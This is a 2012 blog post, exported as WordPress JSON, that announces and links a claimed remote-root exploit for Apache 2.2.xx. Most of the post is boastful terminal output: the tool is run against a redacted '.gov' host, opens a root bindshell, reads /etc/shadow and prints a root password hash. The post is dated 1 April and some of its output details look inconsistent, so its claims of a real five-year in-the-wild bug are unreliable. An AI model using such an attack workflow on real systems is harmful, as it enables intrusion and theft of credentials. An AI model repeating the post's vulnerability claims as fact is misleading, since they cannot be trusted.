{"id":310,"date":"2012-04-01T03:39:48","date_gmt":"2012-04-01T01:39:48","guid":{"rendered":"http:\/\/blog.pi3.com.pl\/?p=310"},"modified":"2012-04-01T13:43:17","modified_gmt":"2012-04-01T11:43:17","slug":"apache-2-2-xx-0day-exploit","status":"publish","type":"post","link":"https:\/\/blog.pi3.com.pl\/?p=310","title":{"rendered":"Apache 2.2.xx 0day exploit"},"content":{"rendered":"

I haven’t been posting on this blog for a while. It doesn’t mean I’m not doing research – I’m just not a big fan of releasing anything and most of my work stays private. Anyway because Apache released new version of their Http Server one of my research was burned. New version of Apache fixes remote code execution<\/span><\/strong> vulnerability in default instalation! This vulnerability is quite old and have been exploited in the wild for last 5 years \ud83d\ude42<\/p>\n

This vulnerability is fixed and no longer be 0day I decided to publish exploit code for this bug. How is it work? Find below:<\/p>\n

pi3-darkstar ~ # gcc Apache_0day.c -o Apache_0day\r\npi3-darkstar ~ # .\/Apache_0day -h\r\n\r\n\u00a0\u00a0 \u00a0...::: -=[ Apache 2.2.xx 0day exploit\u00a0 (by Adam 'pi3' Zabrocki) ]=- :::...\r\n\r\n\u00a0\u00a0 \u00a0Usage: .\/Apache_0day <options>\r\n\r\n\u00a0\u00a0 \u00a0\u00a0\u00a0 \u00a0Options:\r\n\u00a0\u00a0 \u00a0\u00a0\u00a0 \u00a0\u00a0\u00a0 \u00a0 -v <victim>\r\n\u00a0\u00a0 \u00a0\u00a0\u00a0 \u00a0\u00a0\u00a0 \u00a0 -p <port>\r\n\u00a0\u00a0 \u00a0\u00a0\u00a0 \u00a0\u00a0\u00a0 \u00a0 -h this help screen\r\n\r\n\u00a0pi3-darkstar ~ # .\/Apache_0day -v xxx.gov\r\n\r\n\u00a0\u00a0 \u00a0...::: -=[ Apache 2.2.xx 0day exploit\u00a0 (by Adam 'pi3' Zabrocki) ]=- :::...\u00a0\r\n\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 [+] Host alive? ... YES!\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 [+] Connecting... DONE!\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 [+] Checking server... VULNERABLE!\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 [+] Calculating zones... DONE!\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 [+] Let's play with APR allocator....................................................................................................\r\n................................................................................................................................................................\r\n.................................................................................................... DONE!\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 [+] Spawning childs................................................................................... DONE!\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 [+] Addresses? ... YES!\r\n\u00a0 \u00a0 \u00a0 \u00a0\u00a0 \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 [+] @APR child 1... DONE! (0xffffffffbffffe01)\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \u00a0 \u00a0 \u00a0 \u00a0\u00a0 \u00a0 [+] @APR child 2... DONE! (0xffffffffbceffe01)\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 [+] Trying ret-into-system...\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 [+] Connecting to bindshell...\r\n\r\npi3 was here :-) Executing shell...\r\nuid=0(root) gid=0(root) grupy=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) Linux pi3-test 2.6.32.13-grsec #1 SMP Thu May 13 17:07:21 CEST 2010 i686 i686 i386 GNU\/Linux\r\n# cat \/etc\/shadow|head -1\r\nroot:$6$vxdYpCQF$0qPMKMwxwVxLGNSZbOUYxK0n33C2lxCPdQq5n5rtr70dNkNPjEWCmjvKCZOKVP.cOM2PMc3JtOruts7F53\/hp.:15104:0:::::\r\n# exit;!<\/pre>\n
Looks nice, isn’t it? \ud83d\ude42 Now realize it was used in the wild for last 5 years… so better check your machine if no rootkits was installed \ud83d\ude42<\/p>\n
As I promised at the beginning of this post, here is the exploit code: Apache 0day<\/a>.<\/p>\n
 <\/p>\n
Best regards,<\/p>\n
Adam Zabrocki<\/p>\n","protected":false},"excerpt":{"rendered":"
I haven’t been posting on this blog for a while. It doesn’t mean I’m not doing research – I’m just not a big fan of releasing anything and most of my work stays private. Anyway because Apache released new version of their Http Server one of my research was burned. New version of Apache fixes […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[4,5,1],"tags":[],"class_list":["post-310","post","type-post","status-publish","format-standard","hentry","category-bughunt","category-exploiting","category-o-wszystkim-i-o-niczym"],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/blog.pi3.com.pl\/index.php?rest_route=\/wp\/v2\/posts\/310","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.pi3.com.pl\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.pi3.com.pl\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.pi3.com.pl\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.pi3.com.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=310"}],"version-history":[{"count":10,"href":"https:\/\/blog.pi3.com.pl\/index.php?rest_route=\/wp\/v2\/posts\/310\/revisions"}],"predecessor-version":[{"id":321,"href":"https:\/\/blog.pi3.com.pl\/index.php?rest_route=\/wp\/v2\/posts\/310\/revisions\/321"}],"wp:attachment":[{"href":"https:\/\/blog.pi3.com.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=310"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.pi3.com.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=310"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.pi3.com.pl\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=310"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}